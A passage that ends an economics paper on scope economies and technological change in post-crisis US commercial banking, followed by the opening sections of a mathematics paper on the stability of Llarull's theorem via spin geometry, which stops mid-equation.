Notes: The left panel summarizes point estimates of \(\mathcal{R}_{t}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting IRS \([\mathcal{R}_{t}(\tau)>1]\) vs. non-IRS \([\mathcal{R}_{t}(\tau)\leq 1]\) and CRS \([\mathcal{R}_{t}(\tau)=1]\) vs. non-CRS \([\mathcal{R}_{t}(\tau)\neq 1]\) using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negating alternative. Percentage points sum up to a hundred within binary groups only.
\end{table}
Table 5: Returns to Scale Estimates

### Technological Change

We conclude our analysis of bank cost structure by examining temporal shifts in the bank cost frontier in the face of technological advancements as well as regulatory changes in the industry in the aftermath of the 2008 financial crisis. A cost-diminishing technological change can provide another means for cost savings. Because we model temporal variation in the cost relationship using discretized time indices, we replace the standard continuous measure of technical change with a discrete dual measure of technological change at each cost quantile \(\tau\).
Namely, from (3.3), we have \[-TC_{t}(\tau)\equiv\mathcal{Q}_{c}(\tau|\cdot,t)-\mathcal{Q}_{c}(\tau|\cdot,t-1)=\Delta L(t)+\Delta S(t)q_{\tau}+\dots,\] where the omitted terms collect the period-to-period changes in the remaining time-varying coefficients of the cost quantile function. Table 6 summarizes the resulting estimates of \(TC_{t}(\tau)\) together with the corresponding inference results. At the median cost quantile, technical change is statistically positive for a modest 37% of banks. Evidence of significant cost diminution is even weaker among banks in the bottom half of the cost distribution. Overall, our results suggest that the cost-saving effects of many recent technological advancements in the banking industry, such as the growing networks of automated teller machines, growing credit card networks, electronic payments, internet banking, etc., that were found in the pre-crisis period by earlier studies (e.g., Wheelock and Wilson, 1999; Almanidis, 2013; Malikov et al., 2015) have now largely waned, plausibly because most banks had already capitalized on them to the fullest extent feasible and/or because they now face new regulatory controls. The significant technical change among larger banks in the upper tail of the cost distribution is likely due to their better capability to adapt and innovate.

## 6 Conclusion

Propelled by the recent financial product innovations, banks are becoming more complex, branching out into many "nontraditional" banking operations beyond issuance of loans. This broadening of operational scope in pursuit of revenue diversification may be beneficial if banks exhibit scope economies. The existing empirical evidence lends no support for such product-scope-driven cost economies in banking, but it is greatly outdated and, surprisingly, there has been little (if any) research on this subject despite the drastic transformations that the U.S. banking industry has undergone over the past two decades in the wake of technological advancements and regulatory changes. Commercial banks have significantly shifted towards nontraditional operations, and the portfolio of products offered by present-day banks is very different from that two decades ago.
This underscores the importance of taking a fresh look at scope economies in banks because leveraging operational scope continues to play a vital role in operations management in banking. It is also important from a policy evaluation perspective, in the face of new financial regulations such as the Dodd-Frank Wall Street Reform and Consumer Protection Act of 2010 that seek to set restrictions on the scale and scope of bank operations.

\begin{table} \begin{tabular}{l c c c c|c c c c} \hline \hline Cost & \multicolumn{4}{c|}{_Point Estimates_} & \multicolumn{4}{c}{_Inference Categories, \%_} \\ Quantiles (\(\tau\)) & Mean & 1st Qu. & Median & 3rd Qu. & \(=\mathbf{0}\) & \(\neq\mathbf{0}\) & \(>\mathbf{0}\) & \(\leq\mathbf{0}\) \\ \hline \(\mathcal{Q}(0.10)\) & –0.010 & –0.026 & –0.008 & 0.006 & **63.06** & 36.94 & **9.69** & 90.31 \\ & (–0.022, 0.004) & (–0.039, –0.010) & (–0.020, 0.006) & (–0.007, 0.021) & & & & \\ \(\mathcal{Q}(0.25)\) & –0.005 & –0.019 & –0.003 & 0.011 & **61.23** & 38.77 & **17.52** & 82.48 \\ & (–0.015, 0.007) & (–0.031, –0.007) & (–0.013, 0.009) & (0.000, 0.025) & & & & \\ \(\mathcal{Q}(0.50)\) & 0.005 & –0.008 & 0.007 & 0.021 & **53.71** & 46.29 & **36.91** & 63.09 \\ & (–0.004, 0.015) & (–0.018, 0.001) & (–0.002, 0.018) & (0.011, 0.037) & & & & \\ \(\mathcal{Q}(0.75)\) & 0.015 & 0.002 & 0.017 & 0.031 & **47.22** & 52.78 & **54.33** & 45.67 \\ & (0.006, 0.026) & (–0.008, 0.013) & (0.008, 0.030) & (0.019, 0.049) & & & & \\ \(\mathcal{Q}(0.90)\) & 0.021 & 0.007 & 0.022 & 0.037 & **42.91** & 57.09 & **61.50** & 38.50 \\ & (0.008, 0.032) & (–0.005, 0.019) & (0.010, 0.035) & (0.022, 0.056) & & & & \\ \hline \hline \end{tabular} * The left panel summarizes point estimates of \(TC_{t}(\tau)\) with the corresponding two-sided 95% bias-corrected confidence intervals in parentheses. Each bank-year is classified as exhibiting technical progress [\(TC_{t}(\tau)>0\)] vs. non-progress [\(TC_{t}(\tau)\leq 0\)] and technical stasis [\(TC_{t}(\tau)=0\)] vs. non-stasis [\(TC_{t}(\tau)\neq 0\)] using the corresponding one- and two-sided 95% bias-corrected confidence bounds, respectively. The right panel reports sample shares for each category and for its corresponding negative alternative. Percentage points sum up to a hundred within binary groups only. \end{table} Table 6: Technical Change Estimates

This paper provides new evidence about scope economies in U.S. commercial banking during the 2009-2018 post-crisis period. We improve upon the prior literature not only by analyzing the most recent and relevant data and accounting for banks' nontraditional off-balance sheet operations, but also in multiple methodological ways as follows. In pursuit of robust estimates of scope economies and statistical inference thereon, we estimate a flexible, yet parsimonious, time-varying-coefficient panel-data quantile regression model which accommodates three-way bank heterogeneity: (_i_) distributional heterogeneity in the cost structure of banks along the size of their costs, (_ii_) temporal variation in cost complementarities and spillovers due to technological change/innovation, and (_iii_) unobserved bank confounders such as latent management quality. Our results provide strong evidence in support of significantly positive scope economies across banks of virtually all sizes. Contrary to earlier studies, we find no empirical corroboration for scope diseconomies.
2310.14412
Stability of Llarull's theorem in all dimensions
Llarull's theorem characterizes the round sphere $S^n$ among all spin manifolds whose scalar curvature is bounded from below by $n(n-1)$. In this paper we show that if the scalar curvature is bounded from below by $n(n-1)-\varepsilon$, the underlying manifold is $C^0$-close to a finite number of spheres outside a small bad set. This completely solves Gromov's spherical stability problem.
Sven Hirsch, Yiyue Zhang
2023-10-22T20:53:54Z
http://arxiv.org/abs/2310.14412v3
# Stability of Llarull's theorem in all dimensions

###### Abstract.

We prove stability of Llarull's theorem in all dimensions using spin geometry. Our results are stated in terms of both intrinsic flat convergence and \(C^{0}\) convergence outside a small set.

## 1. Introduction

Recently, there has been much interest in analyzing the stability of various scalar curvature geometry results. Roughly speaking, these can be divided into two categories: on the one hand, there are results based on the level-set method such as [1, 2, 13, 14, 22]. On the other hand, there are results exploiting the structure of various special settings such as graphs [9, 21] and spherical symmetry [6, 23]. One particular question is M. Gromov's _spherical stability problem_ [17, page 20] concerning the stability of Llarull's theorem [24]. We refer to C. Sormani's survey [26] for a detailed overview of relevant results and conjectures. In this article, we introduce another method to analyze stability: using spin geometry, we confirm M. Gromov's conjecture in all dimensions for manifolds with a uniform Poincare constant bound.

**Theorem A**.: _Let \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_

1. _the scalar curvatures of_ \(g_{i}\) _satisfy_ \(R_{g_{i}}\geq n(n-1)-\frac{1}{i}\)_,_
2. \(g_{i}\geq g_{0}\)_, where_ \(g_{0}\) _is the round metric on_ \(S^{n}\)_,_
3. _the Poincare constants of_ \((S^{n},g_{i})\) _are uniformly bounded from above,_
4. _the diameters of_ \((S^{n},g_{i})\) _are uniformly bounded from above._

_Then \((S^{n},g_{i})\) converges to \((S^{n},g_{0})\) in the intrinsic flat sense._

We remark that the Poincare constant bound is necessary as demonstrated by P. Sweeney in [28]. However, this assumption is relatively mild and does allow for certain _bags of gold_ or _bubbles_, cf. Figure 1 below. Strengthening the Poincare constant bound to a Cheeger constant bound and assuming an additional volume upper bound, this has already been established in dimension 3 by B. Allen, E. Bryden and D. Kazaras in the important work [2]. In their setting, they are able to replace assumption (1) with an \(L^{2}\) lower bound for the scalar curvature. Their proof relies on the integral formula for spacetime harmonic functions [19] due to D. Kazaras, M. Khuri and the authors which originates from the proof of the spacetime positive mass theorem [18, 20]. We on the other hand use the integral formula for spinors based on Llarull's original paper [24], also see the work of S. Goette and U. Semmelmann [15]. We are also able to impose an integral lower bound on the scalar curvature by replacing the Poincare constant bound with a Sobolev constant bound.

**Theorem B**.: _Let \(\alpha\in[n,\infty]\), and let \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_

1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{i}|S^{n}|^{\frac{2}{\alpha}}_{g_{i}}\)_, where_ \(x_{-}=\max\{-x,0\}\)_,_
2. \(g_{i}\geq g_{0}\)_,_
3. _the normalized Sobolev constants_1 \(C^{*}_{S_{\alpha}}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above,_
4. _the diameters of_ \((S^{n},g_{i})\) _are uniformly bounded from above._

Footnote 1: See Definition 2.4 and Remark 2.6.

_Then \((S^{n},g_{i})\) converges to \((S^{n},g_{0})\) in the intrinsic flat sense._

We remark that Theorem B implies Theorem A for \(\alpha=\infty\). Many scalar curvature stability results are phrased in terms of intrinsic flat convergence. This notion of convergence has been introduced by C. Sormani and S. Wenger [27] and builds upon the theory of currents in metric spaces developed by L. Ambrosio and B. Kirchheim [4].
The popularity of intrinsic flat convergence stems from its ability to control _splines_ or _trees_ which can appear in the limiting process as shown in Figure 1. These splines make it impossible to expect \(C^{0}\) or even Gromov-Hausdorff convergence on the entire manifold. To achieve a stronger notion of convergence, one can remove the bad region containing the splines. This alternative approach, introduced by C. Dong in [13], led to a resolution of the Huisken-Ilmanen conjecture by C. Dong and A. Song in [14]. They excised a small set (measured by the area of its boundary) and showed that the remainder converges in the Gromov-Hausdorff sense. Using spinors in the context of Llarull's theorem, we are even able to obtain \(C^{0}\) convergence outside a small set (measured by its volume). Moreover, we can relax the assumption \(g_{i}\geq g_{0}\) to merely hold on two-forms2 which is in the spirit of Llarull's original work.

Footnote 2: Here we say \(g\geq g_{0}\) on two-forms if \(|w|_{g}\geq|w|_{g_{0}}\) for all \(w\in\Omega^{2}(S^{n})\).

**Theorem C**.: _Let \(\alpha\in[n,\infty]\), and \(g_{i}\) be a sequence of smooth metrics on \(S^{n}\), \(n\geq 3\), such that_

1. \(\|(R_{g_{i}}-n(n-1))_{-}\|_{L^{\frac{\alpha}{2}}(S^{n})}\leq\frac{1}{i}|S^{n}|_{g_{i}}^{\frac{2}{\alpha}}\)_,_
2. \(g_{i}\geq g_{0}\) _on two-forms,_
3. _the normalized Sobolev constants_ \(C^{*}_{S_{\alpha}}\) _of_ \((S^{n},g_{i})\) _are uniformly bounded from above._

_Then for every \(\varepsilon>0\) there exists a set \(\Omega\) with \(|\Omega|_{g_{0}}\leq\varepsilon\) such that \(g_{i}\to g_{0}\) on \(S^{n}\setminus\Omega\) in the \(C^{0}\) sense after passing to a subsequence._

It is necessary to pass to a subsequence in Theorem C and there are counterexamples otherwise, cf. Remark 4.3. We expect that spinors will also be useful to answer other stability questions.

**Acknowledgements:** Part of this work was carried out while the authors attended a conference at the Simons Center for Geometry and Physics and the authors are grateful for the stimulating research environment. SH was supported by the National Science Foundation under Grant No. DMS-1926686, and by the IAS School of Mathematics. The authors also want to thank Brian Allen, Edward Bryden, Demetre Kazaras, Richard Schoen and Christina Sormani for insightful discussions and their interest in this work.

Figure 1. A sequence of manifolds \((S^{n},g_{i})\) with uniformly bounded Poincaré constants, cf. Proposition 2.7.

## 2. Cheeger, Sobolev, and Poincare constants

In this section, we recall the definitions of Cheeger, Sobolev, and Poincare constants and discuss their interrelationships. Throughout this section, \((M^{n},g)\) is a smooth compact Riemannian manifold without boundary.

### Definitions and preliminaries

**Definition 2.1**.: _The Poincare constant of \((M^{n},g)\) is defined by_ \[C_{P}=\sup_{u\in W^{1,2}(M)}\frac{\inf_{a\in\mathbb{R}}\|u-a\|_{2}^{2}}{\|\nabla u\|_{2}^{2}}. \tag{1}\]

We remark that \(C_{P}^{-1}\) is the first nonzero eigenvalue of the Laplace operator on \(M^{n}\). Before we define the Sobolev constants \(C_{S_{\alpha}}\), we first introduce two other, more commonly used geometric constants, see for instance [12, Definition 2.4] by X. Dai, G. Wei and Z. Zhang, and [10] by P. Li.
**Definition 2.2**.: _For \(\alpha\in[n,\infty]\), the Neumann \(\alpha\)-isoperimetric constant \(\mathrm{IN}_{\alpha}\) of \(M\) is defined by_ \[\mathrm{IN}_{\alpha}(M)=\sup_{\Sigma}\frac{\min\{|\Omega_{1}|,|\Omega_{2}|\}^{1-\frac{1}{\alpha}}}{|\Sigma|}, \tag{2}\] _where \(\Sigma\) is any smooth surface dividing \(M\) into the regions \(\Omega_{1}\) and \(\Omega_{2}\). The Neumann \(\alpha\)-Sobolev constant of \(M\) is defined by_ \[\mathrm{SN}_{\alpha}=\sup_{f\in W^{1,1}(M)}\frac{\inf_{a\in\mathbb{R}}\|f-a\|_{\frac{\alpha}{\alpha-1}}}{\|\nabla f\|_{1}}. \tag{3}\]

The Neumann \(\infty\)-isoperimetric constant \(\mathrm{IN}_{\infty}\) is usually referred to as the Cheeger constant. We remark that some authors refer to \(\mathrm{IN}_{\infty}^{-1}\) as the Cheeger constant instead. Next, we recall from [10, Theorem 9.2].

**Proposition 2.3**.: _For all \(n\leq\alpha\leq\infty\), we have_ \[\frac{1}{2}\,\mathrm{IN}_{\alpha}(M)\leq\mathrm{SN}_{\alpha}(M)\leq\mathrm{IN}_{\alpha}(M). \tag{4}\]

**Definition 2.4**.: _For \(\alpha\in[n,\infty]\), the Sobolev constant \(C_{S_{\alpha}}\) and the normalized Sobolev constant \(C_{S_{\alpha}}^{*}\) are defined by_ \[C_{S_{\alpha}}=\sup_{f\in W^{1,2}}\frac{\inf_{a\in\mathbb{R}}\|f-a\|_{\frac{2\alpha}{\alpha-2}}}{\|\nabla f\|_{2}}\quad\text{and}\quad C_{S_{\alpha}}^{*}=C_{S_{\alpha}}|M|^{\frac{1}{\alpha}}. \tag{5}\]

In Section 2.2, we will delve deeper into the case \(\alpha=\infty\) and compare the Cheeger constant to the Poincare constant. We will observe that a bound on the former implies a bound on the latter. Similarly, a bound on \(\mathrm{SN}_{\alpha}\) implies a bound on \(C_{S_{\alpha}}\). For the reader's convenience, we sketch the following proof of R. Schoen [25].

**Proposition 2.5**.: _Let \(p\in[1,\alpha)\). For any \(f\in C^{\infty}(M)\), we have_ \[\inf_{a\in\mathbb{R}}\|f-a\|_{\frac{p\alpha}{\alpha-p}}\leq\frac{p(\alpha-1)}{\alpha-p}\,\mathrm{IN}_{\alpha}\,\|\nabla f\|_{p}. \tag{6}\]

Proof.: Let \(\bar{f}\) be the constant such that \(|\{f\geq\bar{f}\}|\geq\frac{1}{2}|M|\) and \(|\{f\leq\bar{f}\}|\geq\frac{1}{2}|M|\). Then we have \[\mathrm{IN}_{\alpha}(M)=\sup_{f\in C^{\infty}(M)}\frac{\|f-\bar{f}\|_{\frac{\alpha}{\alpha-1}}}{\|\nabla f\|_{1}}. \tag{7}\] Let \(v=(f-\bar{f})_{+}\) and observe that \(|\{v\geq 0\}|\geq\frac{1}{2}|M|\) and \(|\{v\leq 0\}|\geq\frac{1}{2}|M|\). Hence, we may apply (7) with \(\bar{v}=0\). Combining this with Holder's inequality yields \[\left(\int_{M}v^{\frac{s\alpha}{\alpha-1}}dV\right)^{\frac{\alpha-1}{\alpha}}\leq s\operatorname{IN}_{\alpha}\int_{M}v^{s-1}|\nabla v|dV\leq s\operatorname{IN}_{\alpha}\left(\int_{M}v^{(s-1)\frac{p}{p-1}}dV\right)^{\frac{p-1}{p}}\|\nabla v\|_{p} \tag{8}\] where we set \(s=\frac{p(\alpha-1)}{\alpha-p}\) which ensures \(\frac{s\alpha}{\alpha-1}=\frac{p(s-1)}{p-1}\). Similarly, we obtain \[\left(\int_{M}(f-\bar{f})_{-}^{\frac{s\alpha}{\alpha-1}}dV\right)^{\frac{\alpha-1}{\alpha}}\leq s\operatorname{IN}_{\alpha}\left(\int_{M}((f-\bar{f})_{-})^{(s-1)\frac{p}{p-1}}dV\right)^{\frac{p-1}{p}}\|\nabla(f-\bar{f})_{-}\|_{p}. \tag{9}\] Adding the above two inequalities gives \[\left(\int_{M}|f-\bar{f}|^{\frac{p\alpha}{\alpha-p}}dV\right)^{\frac{1}{p}-\frac{1}{\alpha}}\leq\frac{p(\alpha-1)}{\alpha-p}\operatorname{IN}_{\alpha}\|\nabla f\|_{p} \tag{10}\] which finishes the proof.

**Remark 2.6**.: _Since \(g_{i}\geq g_{0}\) implies a lower volume bound, Theorem B still holds with an upper bound on \(C_{S_{\alpha}}\) instead of \(C_{S_{\alpha}}^{*}\).
Moreover, according to the above proposition, Theorem B also holds with an upper bound on \(\operatorname{SN}_{\alpha}\) and \(\operatorname{IN}_{\alpha}\)._ ### Comparison between the Cheeger and the Poincare constant As mentioned above, a uniform upper bound on the Cheeger constants implies a uniform upper bound on the Poincare constants. This is known as Cheeger's inequality [11]. According to Buser's inequality [8], the reverse inequality also holds as long as a uniform lower Ricci curvature bound is imposed. This condition is necessary as demonstrated in [7, Section 4] by P. Buser where the conformal invariance of the Dirichlet integral in dimension \(2\) is exploited. In the proposition below, we adapt this example to higher dimensions. In particular, a Poincare constant upper bound does not prevent the presence of bags of gold, cf. Figure 1. **Proposition 2.7**.: _There exists a family of metrics \(g_{\delta}\) on \(S^{n}\) such that the Poincare constants of \(g_{\delta}\) are uniformly bounded from above while the Cheeger constants diverge to \(\infty\)._ Proof.: Let \(g_{0}\) be the round metric, fix an equator \(S^{n-1}\subset S^{n}\), and let \(\rho\) be the signed distance function (w.r.t. \(g_{0}\)) to this equator. For each \(\delta\in(0,\frac{1}{2}]\), we define \(g_{\delta}=ug_{0}\) where \(u=u_{\delta}(\rho)\) is a function depending only on \(\rho\). More precisely, we prescribe that * \(u(\rho)=u(-\rho)\), * \(u(\rho)=1\) for \(\rho\in[\delta,\frac{\pi}{2}]\), * \(u\) attains its minimum at \(\rho=0\) with \(u(0)=\delta^{\frac{1}{n-1}}\), * \(u\leq 1\) for all \(\rho\in[-\frac{\pi}{2},\frac{\pi}{2}]\). It is easy to see that the Cheeger constants of \((S^{n},g_{\delta})\) diverge to \(\infty\) for \(\delta\to 0\) in view of Definition (2). To see that the Poincare constants stay bounded for \(\delta\to 0\), we proceed as follows. Let \(\psi\) be the first eigenfunction of the Laplacian and recall that it realizes the Poincare constant, i.e. \(C_{P}=\frac{\int_{S^{n}}\psi^{2}dV_{g}}{\int_{S^{n}}|\nabla\psi|^{2}dV_{g}}\). Here we omit any \(\delta\) subscripts to declutter the notation. First, observe that \(\psi\) inherits the symmetries of \(u\), i.e. \(\psi\) depends only on \(\rho\), and \(\psi(\rho)=\psi(-\rho)\). Moreover, we may scale \(\psi\) such that \(\psi(\pm\frac{\pi}{2})=\pm 1\). Next, we claim that \(\psi\) is monotonically increasing in \(\rho\) which in particular implies that \(|\psi|\leq 1\). Suppose \(\psi\) is not monotone. Then there exist various local minima and maxima which will be attained at \(-a_{k},-a_{k-1},\ldots,-a_{1},a_{1},\ldots,a_{k-1},a_{k}\). We denote with \(b_{k}\) the function values \(b_{k}=\psi(a_{k})\). Note that \(b_{k}=-b_{-k}\). Let \(b_{l}\) be the maximal value of \(\{b_{1},\ldots,b_{k}\}\). We distinguish two cases. First suppose that \(b_{l}\geq 1\). In this case, consider the function \(\overline{\psi}\) defined by \(\overline{\psi}(x)=b_{k}\) for \(x\geq a_{k}\), and \(\overline{\psi}(x)=\psi(x)\) for \(x<a_{k}\). Then \(\int_{S^{n}}\overline{\psi}^{2}dV_{g}>\int_{S^{n}}\psi^{2}dV_{g}\) and \(\int_{S^{n}}|\nabla\overline{\psi}|^{2}dV_{g}<\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\). This is a contradiction to the assumption that \(\psi\) realizes the Poincare constant. Suppose now that that \(b_{l}<1\). 
In this case, we can find a point \(c\in(a_{l},1)\) such that \(\psi(c)=b_{l}\) and \(\psi(x)<b_{l}\) for \(x\in(a_{l},c)\) Now we proceed as above by setting \(\overline{\psi}(x)=b_{l}\) for \(x\in[a_{l},c]\) which again leads to contradiction. Hence, \(\psi\) is monotone and we have \(|\psi|\leq 1\). To estimate the Poincare constants of \((S^{n},g_{\delta})\) we need to make another case decomposition. First, suppose that \(\psi(\delta)\leq\frac{1}{2}\). To show that the Poincare constant is uniformly bounded (in \(\delta\)), we need to estimate \(\int_{S^{n}}\psi^{2}dV_{g}\) from above and \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\) from below. Clearly, \(\int_{S^{n}}\psi^{2}dV_{g}\leq|S^{n}|_{g_{0}}\) since \(|\psi|\leq 1\). Define \(\overline{\psi}\) by setting \(\psi(\rho)=0\) for \(\rho\in[-\delta,\delta]\), and \(\overline{\psi}(\rho)=a\psi(\rho)-b\) otherwise. Here, the constants \(a\in[1,2]\) and \(b\in[0,1]\) are chosen such that \(\overline{\psi}\) is Lipschitz and \(\overline{\psi}(\pm 1)=\pm 1\). Then \(\overline{\psi}\) is a valid competitor for computing the Poincare constant for \((S^{n},g_{0})\). Moreover, \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\geq\frac{1}{4}\int_{S^{n}}|\nabla\overline{ \psi}|^{2}dV_{g_{0}}\). Thus, we have obtained a uniform bound for \(C_{P}\) in this case. Next, suppose that \(\psi(\delta)>\frac{1}{2}\). Again, we obtain the bound \(\int_{S^{n}}\psi^{2}dV_{g}\leq|S^{n}|_{g_{0}}\) and it remains to estimate \(\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\). We compute \[\int_{S^{n}}|\nabla\psi|^{2}dV_{g}\geq\int_{-\delta\leq\rho\leq\delta}|\nabla \psi|^{2}dV_{g}\geq\int_{-\delta}^{\delta}|S^{n-1}|_{g_{0}}\left(\sqrt{1- \delta^{2}}u(0)\right)^{n-1}|\nabla\psi|^{2}d\rho\geq C(n)\delta\int_{-\delta} ^{\delta}|\nabla\psi|^{2}d\rho \tag{11}\] where \(C(n)\) is a constant depending only on \(n\). Since \(u\leq 1\), we have \(|\nabla\psi|^{2}\geq(\partial_{\rho}\psi)^{2}\). Hence, \[\int_{-\delta}^{\delta}|\nabla\psi|^{2}d\rho\geq\int_{-\delta}^{\delta}( \partial_{\rho}\psi)^{2}d\rho\geq\frac{1}{2\delta}\left(\int_{-\delta}^{\delta }\partial_{\rho}\psi d\rho\right)^{2}>\frac{1}{2\delta}, \tag{12}\] and the result follows. We remark that \((S^{n},g_{\delta})\) does not converge to \((S^{n},g_{0})\) in the intrinsic flat convergence, cf. [3, Example 2.5]. We also note that \(g_{\delta}\geq g_{0}\) does not hold, and the above example is therefore not a counter example to Theorem A. A similar example can be constructed where the Neumann \(\alpha\)-Sobolev constants \(\mathrm{SN}_{\alpha}\) go to infinity, but the Sobolev constants \(C_{S_{\alpha}}\) remain bounded. The key is to make the cylinder connecting the two hemispheres very short so the gradient of \(\psi\) cannot accumulate in this region. ## 3. Proof of Theorem A **Lemma 3.1**.: _Let \(n\geq 3\), let \(g\) be a smooth complete metric on \(S^{n}\) and let \(\varepsilon\leq\min\{C_{P}^{-1},\frac{1}{100}\}\). Suppose that \(g\geq g_{0}\) on two-forms, and \(R_{g}\geq n(n-1)-\varepsilon\). Then there exists a constant \(C_{n}\) depending only on \(n\) such that_ \[|S^{n}|_{g}-|S^{n}|_{g_{0}}\leq C_{n}\sqrt{\varepsilon}. \tag{13}\] Proof in even dimensions.: Let \(\{e_{1},...,e_{n}\}\) be an orthonormal frame on \((S^{n},g_{0})\), which forms an orthogonal frame with respect to \(g\). We define \(\lambda_{j}=|e_{j}|_{g}\). 
According to Llarull's paper [24], we have \[\int_{S^{n}}|\phi|^{2}\left[\sum_{j\neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{ g}\right]dV_{g}\geq 4\int_{S^{n}}|\nabla\phi|^{2}dV_{g}, \tag{14}\] where \(\phi\) is the harmonic spinor on the twisted spin bundle defined in [24]. Note that by assumption \(\lambda_{j}\lambda_{l}\geq 1\) for all \(j\neq l\). Without loss of generality, we may rescale \(\phi\) such that \(\int_{S^{n}}|\phi|dV_{g}=|S^{n}|_{g}\). Using the Poincare inequality and Kato's inequality, we obtain \[4C_{P}\int_{S^{n}}|\nabla\phi|^{2}dV_{g}\geq 4\int_{S^{n}}(|\phi|-1)^{2}dV_{g}. \tag{15}\] Combining this with our assumptions and equation (14) yields \[\varepsilon\int_{S^{n}}|\phi|^{2}dV_{g}\geq 4C_{P}^{-1}\int_{S^{n}}(|\phi|-1)^{2} dV_{g}. \tag{16}\] Using \[\int_{S^{n}}|\phi|^{2}dV_{g}=|S^{n}|_{g}+\int_{S^{n}}(|\phi|-1)^{2}dV_{g}, \tag{17}\] we obtain \[\varepsilon|S^{n}|_{g}\geq(4C_{P}^{-1}-\varepsilon)\int_{S^{n}}(|\phi|-1)^{2}dV_ {g} \tag{18}\] and \[\int_{S^{n}}|\phi|^{2}dV_{g}\leq\frac{4}{4-C_{P}\varepsilon}|S^{n}|_{g}. \tag{19}\] Next, let \(\mathcal{A}\) be the subset of \((S^{n},g)\) such that \(\max_{l\neq j}\{\lambda_{l}\lambda_{j}\}\geq 1+\sqrt{\varepsilon}\) and suppose that \(\lambda_{1}\leq\cdots\leq\lambda_{n}\). Since \(g\geq g_{0}\) on two-forms, we have \(\lambda_{l}\lambda_{j}\geq 1\) for all \(l\neq j\) which implies \[\sum_{j\neq l}\frac{1}{\lambda_{j}\lambda_{l}}\leq n(n-1)-2+\frac{2}{\lambda_ {n-1}\lambda_{n}}. \tag{20}\] Therefore, we obtain on \(\mathcal{A}\) \[\sum_{j\neq l}\frac{1}{\lambda_{l}\lambda_{j}}-R_{g}\leq\frac{2}{\lambda_{n- 1}\lambda_{n}}-2+\varepsilon\leq 2(1+\sqrt{\varepsilon})^{-1}-2+\varepsilon=-2 \sqrt{\varepsilon}(1+\sqrt{\varepsilon})^{-1}+\varepsilon\leq-\varepsilon^{ \frac{1}{2}}. \tag{21}\] Consequently, \[\begin{split} 0\leq&\int_{S^{n}}|\phi|^{2}\left[\sum_{j \neq l}\frac{1}{\lambda_{j}\lambda_{l}}-R_{g}\right]dV_{g}\\ \leq&\int_{\mathcal{A}^{c}}\varepsilon|\phi|^{2}dV_{g }-\int_{\mathcal{A}}\sqrt{\varepsilon}|\phi|^{2}dV_{g}\\ =&\varepsilon\int_{S^{n}}|\phi|^{2}dV_{g}-( \varepsilon+\sqrt{\varepsilon})\int_{\mathcal{A}}|\phi|^{2}dV_{g}.\end{split} \tag{22}\] Next, we use (18) to estimate \[\begin{split}\int_{\mathcal{A}}|\phi|^{2}dV_{g}&\geq \int_{\mathcal{A}}2(|\phi|-1)+1dV_{g}\\ &\geq-2|\mathcal{A}|_{g}^{\frac{1}{2}}\left[\int_{\mathcal{A}}(| \phi|-1)^{2}dV_{g}\right]^{\frac{1}{2}}+|\mathcal{A}|_{g}\\ &\geq-2\left(\frac{\varepsilon}{4C_{P}^{-1}-\varepsilon}\right)^ {\frac{1}{2}}|S^{n}|_{g}^{\frac{1}{2}}|\mathcal{A}|_{g}^{\frac{1}{2}}+| \mathcal{A}|_{g}\\ &\geq\frac{1}{2}|\mathcal{A}|_{g}-2\sqrt{\varepsilon}|S^{n}|_{g}. \end{split} \tag{23}\] Combining this inequality with (19) and (22) yields \[0\leq\frac{4\varepsilon}{4-\varepsilon C_{P}}|S^{n}|_{g}-(\varepsilon+\sqrt{ \varepsilon})\left[\frac{1}{2}|\mathcal{A}|_{g}-2\sqrt{\varepsilon}|S^{n}|_{g}\right] \tag{24}\] which implies \[|\mathcal{A}|_{g}\leq 8\sqrt{\varepsilon}|S^{n}|_{g}. \tag{25}\] Note that \[|\mathcal{A}^{c}|_{g}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|\mathcal{A}^{c} |_{g_{0}}\leq(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}}. \tag{26}\] Therefore, \[|S^{n}|_{g}\leq(1-8\sqrt{\varepsilon})^{-1}|\mathcal{A}^{c}|_{g}\leq(1-8\sqrt {\varepsilon})^{-1}(1+\sqrt{\varepsilon})^{\frac{n}{4}}|S^{n}|_{g_{0}} \tag{27}\] which finishes the proof. ### Odd dimensional case So far we have showed Lemma 3.1 in even dimensions. We now describe the required adjustments to also obtain the odd dimensional case. This closely follows Llarull's original ideas [24]. 
Let \(n\geq 3\) be an odd integer. Consider the product metric \(\overline{g}=ds^{2}+g\) on \(S^{n}\times S^{1}_{r}\), where \(S^{1}_{r}\) is a circle of radius \(r\). We note that \(R_{g}=R_{\overline{g}}\) and \[S^{n}\times S^{1}_{r}\xrightarrow{\operatorname{Id}\times\frac{1}{r} \operatorname{Id}}S^{n}\times S^{1}\xrightarrow{h}S^{n}\wedge S^{1}\cong S^{n +1}, \tag{28}\] where \(\wedge\) is the smash product and \(h\) is a \(1\)-contracting map. Applying the spinorial integral formula (14) to the even dimensional manifold \((S^{n}\times S^{1}_{r},\overline{g})\) and using Kato's inequality, we obtain \[\int_{S^{n}\times S^{1}_{r}}\left[2\sum_{1\leq l<j\leq n}\frac{1}{\lambda_{l }\lambda_{j}}+\frac{2}{r}\sum_{l=1}^{n}\frac{1}{\lambda_{l}}-R_{g}\right]| \phi|_{\overline{g}}^{2}dV_{\overline{g}}\geq\int_{S^{n}\times S^{1}_{r}}4| \nabla\phi|_{\overline{g}}^{2}dV_{\overline{g}}. \tag{29}\] For any \(\delta>0\), by choosing \(r\) sufficiently large, there exists a point \(p\) on \(S^{1}_{r}\) such that \[\int_{S^{n}\times\{p\}}\left[2\sum_{1\leq l<j\leq n}\frac{1}{\lambda_{l} \lambda_{j}}-R_{g}-\delta\right]|\phi|_{\overline{g}}^{2}dV_{g}\geq\int_{S^{n 